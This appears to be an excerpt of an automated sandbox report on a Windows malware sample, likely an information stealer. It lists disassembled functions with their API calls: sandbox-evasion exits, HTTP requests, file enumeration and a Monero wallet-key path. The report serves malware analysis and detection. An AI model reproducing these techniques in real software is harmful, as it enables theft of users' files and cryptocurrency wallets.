                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                    • String ID:
                    • API String ID: 2931873225-0
                    • Opcode ID: 0b0f29a3cba93b4dda9abcb2868a1f9ee60ad200434961c60dff8a0768fcbf71
                    • Instruction ID: 642132a5522d98f75549f7b69b1fcc1b0b5133c5e1fb9b3e279fd33db5df4d2d
                    • Opcode Fuzzy Hash: 0b0f29a3cba93b4dda9abcb2868a1f9ee60ad200434961c60dff8a0768fcbf71
                    • Instruction Fuzzy Hash: C1313E70950208BAEB88FBF0DC56BEE777AFF45341F00452CF612A6182DF706945C6AA
                    Function 00646AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1436 646af3 1437 646b0a 1436->1437 1439 646b0c-646b22 call 646920 call 645b10 CloseHandle ExitProcess 1437->1439 1440 646aba-646ad7 call 64aad0 OpenEventA 1437->1440 1446 646af5-646b04 CloseHandle Sleep 1440->1446 1447 646ad9-646af1 call 64aad0 CreateEventA 1440->1447 1446->1437 1447->1439
                    APIs
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01449FF8,?,0065110C,?,00000000,?,00651110,?,00000000,00650AEF), ref: 00646ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00646AE8
                    • CloseHandle.KERNEL32(00000000), ref: 00646AF9
                    • Sleep.KERNEL32(00001770), ref: 00646B04
                    • CloseHandle.KERNEL32(?,00000000,?,01449FF8,?,0065110C,?,00000000,?,00651110,?,00000000,00650AEF), ref: 00646B1A
                    • ExitProcess.KERNEL32 ref: 00646B22
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                    • String ID:
                    • API String ID: 941982115-0
                    • Opcode ID: 0b6839cd838540379814cdca721a947a1fa9f9a1fbdccc6908a1dd3fac21484d
                    • Instruction ID: d94f6813d9c13335d700c66343b028fed51d154367f7af6f379548ef9aa0bfbf
                    • Opcode Fuzzy Hash: 0b6839cd838540379814cdca721a947a1fa9f9a1fbdccc6908a1dd3fac21484d
                    • Instruction Fuzzy Hash: 4CF08270940219AFE744ABA0DD0ABBD7B76FB06741F104918F917E11C5CBB095C1D65B
                    Function 006347B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00634839
                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00634849
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CrackInternetlstrlen
                    • String ID: <
                    • API String ID: 1274457161-4251816714
                    • Opcode ID: 70e56e34d2ae5eb7ef186829bd9242aae4cfe7b4517206bd26cca5934005a942
                    • Instruction ID: 073af1ffb82c87a59747e5c72b85a78916442072522f46e010611d705c0d039f
                    • Opcode Fuzzy Hash: 70e56e34d2ae5eb7ef186829bd9242aae4cfe7b4517206bd26cca5934005a942
                    • Instruction Fuzzy Hash: D4214FB1D00209ABDF14DFA4E849ADE7B75FB45320F108629F959A72C1EB706A05CF91
                    Function 006451F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 00636280: InternetOpenA.WININET(00650DFE,00000001,00000000,00000000,00000000), ref: 006362E1
                      • Part of subcall function 00636280: StrCmpCA.SHLWAPI(?,014507B0), ref: 00636303
                      • Part of subcall function 00636280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00636335
                      • Part of subcall function 00636280: HttpOpenRequestA.WININET(00000000,GET,?,0144FDD8,00000000,00000000,00400100,00000000), ref: 00636385
                      • Part of subcall function 00636280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006363BF
                      • Part of subcall function 00636280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006363D1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00645228
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                    • String ID: ERROR$ERROR
                    • API String ID: 3287882509-2579291623
                    • Opcode ID: a8cbbbe75b5aa28209f03748a8a0082563c962dfbc2ea9d74baae12eea975f0b
                    • Instruction ID: 194d91e7e95756fc04db195895eb024eccf5e7e49ca5fd4ec4a29b632f22944a
                    • Opcode Fuzzy Hash: a8cbbbe75b5aa28209f03748a8a0082563c962dfbc2ea9d74baae12eea975f0b
                    • Instruction Fuzzy Hash: 56113070940108BBEB54FFA0DD52AED733AAF50300F40415CF80B5B192EF30AB06CA96
                    Function 00631220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1493 631220-631247 call 6489b0 GlobalMemoryStatusEx 1496 631273-63127a 1493->1496 1497 631249-631271 call 64da00 * 2 1493->1497 1499 631281-631285 1496->1499 1497->1499 1501 631287 1499->1501 1502 63129a-63129d 1499->1502 1504 631292-631294 ExitProcess 1501->1504 1505 631289-631290 1501->1505 1505->1502 1505->1504
                    APIs
                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0063123E
                    • ExitProcess.KERNEL32 ref: 00631294
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitGlobalMemoryProcessStatus
                    • String ID: @
                    • API String ID: 803317263-2766056989
                    • Opcode ID: e6efc889250bf0446aa6d6da79016c823cacdb82793a996f90123a99e764e676
                    • Instruction ID: 31be10a428f8c3da4e0bbdab57138cc94904222b5643c2e75d75ebcf53ea1eba
                    • Opcode Fuzzy Hash: e6efc889250bf0446aa6d6da79016c823cacdb82793a996f90123a99e764e676
                    • Instruction Fuzzy Hash: 8B016DB0D40308BBEB10EFE4CC49B9EBB79BB05705F208048E705BA2C0D77496818799
                    Function 006478E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00647910
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00647917
                    • GetComputerNameA.KERNEL32(?,00000104), ref: 0064792F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateComputerNameProcess
                    • String ID:
                    • API String ID: 1664310425-0
                    • Opcode ID: 146b9d1de7a662fac774fffb2466d1f246fb8f30d0ca147b4ac50b2ed45349e4
                    • Instruction ID: 26f6423adcf6c13931ab103fc01a025f39d1406d7a446d085441aba92105c059
                    • Opcode Fuzzy Hash: 146b9d1de7a662fac774fffb2466d1f246fb8f30d0ca147b4ac50b2ed45349e4
                    • Instruction Fuzzy Hash: E601A9B1A04204EFC704DF94DD49BAEBBB8F744B11F104269F955E3380D37559448BA2
                    Function 00631110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0063112B
                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00631132
                    • ExitProcess.KERNEL32 ref: 00631143
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$AllocCurrentExitNumaVirtual
                    • String ID:
                    • API String ID: 1103761159-0
                    • Opcode ID: 8bf967c960280b3cb5e82ee4dce58125627cddd10621414ba9ae34fea34e7d66
                    • Instruction ID: e2d0fd1d63822dedb263ec93f2cb139557207337dda9a7ea30426b4e18d0f8cc
                    • Opcode Fuzzy Hash: 8bf967c960280b3cb5e82ee4dce58125627cddd10621414ba9ae34fea34e7d66
                    • Instruction Fuzzy Hash: CCE0867094930CFBE7146BA09C0EB4C7678BB44B02F100054F70C7A1C0CAB4664096DA
                    Function 006310A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006310B3
                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006310F7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Virtual$AllocFree
                    • String ID:
                    • API String ID: 2087232378-0
                    • Opcode ID: d4c93c9ac242acb7bcbecb17fe41fd71942f32ab8b0fa9ba5ad907ab312229a0
                    • Instruction ID: 85f7e79a9edbc622cdae34578567b57dc8c7e58173d5d4e30bb28ba196c427fb
                    • Opcode Fuzzy Hash: d4c93c9ac242acb7bcbecb17fe41fd71942f32ab8b0fa9ba5ad907ab312229a0
                    • Instruction Fuzzy Hash: D3F0E971641204BBE71896A49C49FAEB7DCE705715F300448F504E7380D5719E40CAA5
                    Function 00631190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00647910
                      • Part of subcall function 006478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00647917
                      • Part of subcall function 006478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0064792F
                      • Part of subcall function 00647850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006311B7), ref: 00647880
                      • Part of subcall function 00647850: RtlAllocateHeap.NTDLL(00000000), ref: 00647887
                      • Part of subcall function 00647850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0064789F
                    • ExitProcess.KERNEL32 ref: 006311C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                    • String ID:
                    • API String ID: 3550813701-0
                    • Opcode ID: 5723f00d89809ec2d1b5c45e251cb893b6c337da0b068ea312a5af753442e6b4
                    • Instruction ID: 992641a11506c99b4263cc70047e416f75431bbefb6d33f3efd5eeb3670a0436
                    • Opcode Fuzzy Hash: 5723f00d89809ec2d1b5c45e251cb893b6c337da0b068ea312a5af753442e6b4
                    • Instruction Fuzzy Hash: 77E012B5D143055BCB4477F0BC0EB6E329E6B55746F04083CFA09D7602FA65E84086AE

                    Non-executed Functions

                    Function 006438B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                    Download Yara Rule
                    APIs
                    • wsprintfA.USER32 ref: 006438CC
                    • FindFirstFileA.KERNEL32(?,?), ref: 006438E3
                    • lstrcat.KERNEL32(?,?), ref: 00643935
                    • StrCmpCA.SHLWAPI(?,00650F70), ref: 00643947
                    • StrCmpCA.SHLWAPI(?,00650F74), ref: 0064395D
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00643C67
                    • FindClose.KERNEL32(000000FF), ref: 00643C7C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                    • API String ID: 1125553467-2524465048
                    • Opcode ID: 2cb85b8d3003ab26c5373eb29f1228cdb9fa6729c8d2d197f103cfb2e6a97802
                    • Instruction ID: cab60d190722965d57f479f859c5642813eed581aa7094d281b6bbd8351ed6d4
                    • Opcode Fuzzy Hash: 2cb85b8d3003ab26c5373eb29f1228cdb9fa6729c8d2d197f103cfb2e6a97802
                    • Instruction Fuzzy Hash: 84A162B1900218AFDB64EFA4DC89FEE7379BF94301F044588A50D96245EB749B84CFA2
                    Function 0063BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
